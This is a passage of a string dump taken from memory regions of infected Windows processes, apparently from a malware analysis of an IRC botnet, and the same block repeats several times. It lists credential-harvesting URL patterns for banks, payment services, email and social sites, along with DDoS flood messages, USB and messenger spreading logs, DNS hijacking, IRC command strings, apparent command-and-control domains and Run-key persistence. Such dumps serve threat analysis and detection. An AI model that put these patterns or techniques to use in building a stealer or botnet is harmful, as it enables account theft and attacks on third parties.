login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>svchost.exe_1192_rwx_00CF0000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>imapi.exe_1264_rwx_00A70000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d 